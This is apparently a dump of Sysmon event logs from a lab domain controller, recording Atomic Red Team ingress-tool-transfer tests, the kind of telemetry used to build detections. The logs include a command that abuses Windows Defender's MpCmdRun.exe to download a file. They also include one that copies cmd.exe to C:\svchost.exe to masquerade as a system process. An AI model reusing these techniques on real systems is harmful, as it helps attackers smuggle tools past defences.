21:49:27.306{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917369Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.306{896A638B-B8DD-6058-9202-00000000AE01}36324724C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7669-00000000AE01}6356C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917368Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.305{896A638B-B3E7-605B-7569-00000000AE01}13967632C:\Windows\system32\cmd.exe{896A638B-B3E7-605B-7669-00000000AE01}6356C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917367Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.294{896A638B-B3E7-605B-7669-00000000AE01}6356C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe4.18.2010.7 (WinBuild.160101.0800)Microsoft Malware Protection Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMpCmdRun.exeMpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\ADMINI~1\AppData\Local\Temp\2\Atomic-license.txt C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=EEC27FC7FA4E054BA7108573F9C55B31,SHA256=9D4EF8248AA778475FC864001208FB64FF22B94C0268FB8E945ABB176353E26E,IMPHASH=11272291EEE614C53BFCC9CA857AFAA9{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*" & MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path %temp%\Atomic-license.txt" 10341000x80000000000000005917366Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.281{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917365Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.279{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917364Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.277{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917363Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.277{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917362Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.277{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917361Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.276{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917360Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.276{896A638B-B8DD-6058-9202-00000000AE01}36323472C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917359Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.276{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b2871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af43b9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3aaaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b349(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3e2d74(wow64) 154100x80000000000000005917358Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.267{896A638B-B3E7-605B-7569-00000000AE01}1396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "cd "%%ProgramData%%\Microsoft\Windows Defender\platform\4.18*" & MpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path %%temp%%\Atomic-license.txt" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917357Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.267{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917356Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.266{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917355Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.252{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=379A5AA2057F3D3293233E77F8FA8A2A,SHA256=91758ECD8C5D66725E2F45A7AAD79054B550C12C43266029AD1A0EC2FF2A8C67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917354Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.231{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=D9C586991FACF81AE3350D1F2468D551,SHA256=A04C3131D5D2D6A794281B2525967934811D733BE6DFCE8658AC90F520F8A14F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917353Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.207{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7469-00000000AE01}5088C:\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917352Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.204{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B3E7-605B-7469-00000000AE01}5088C:\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917351Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.203{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917350Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.203{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917349Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.203{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917348Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.203{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917347Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.203{896A638B-B3E7-605B-7369-00000000AE01}79686376C:\Windows\system32\cmd.exe{896A638B-B3E7-605B-7469-00000000AE01}5088C:\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917346Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.201{896A638B-B3E7-605B-7469-00000000AE01}5088C:\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\svchost.exe /c echo T1105 C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "copy C:\Windows\System32\cmd.exe C:\svchost.exe & C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt" 11241100x80000000000000005917345Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.198{896A638B-B5C0-6058-0100-00000000AE01}4SystemC:\T1105.txt2021-03-24 21:49:27.198 11241100x80000000000000005917344Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.localEXE2021-03-24 21:49:27.193{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\system32\cmd.exeC:\svchost.exe2021-03-24 21:49:27.193 10341000x80000000000000005917343Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.190{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917342Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.188{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E7-605B-7369-00000000AE01}7968C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA6D95C033) 10341000x80000000000000005917341Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.185{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917340Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 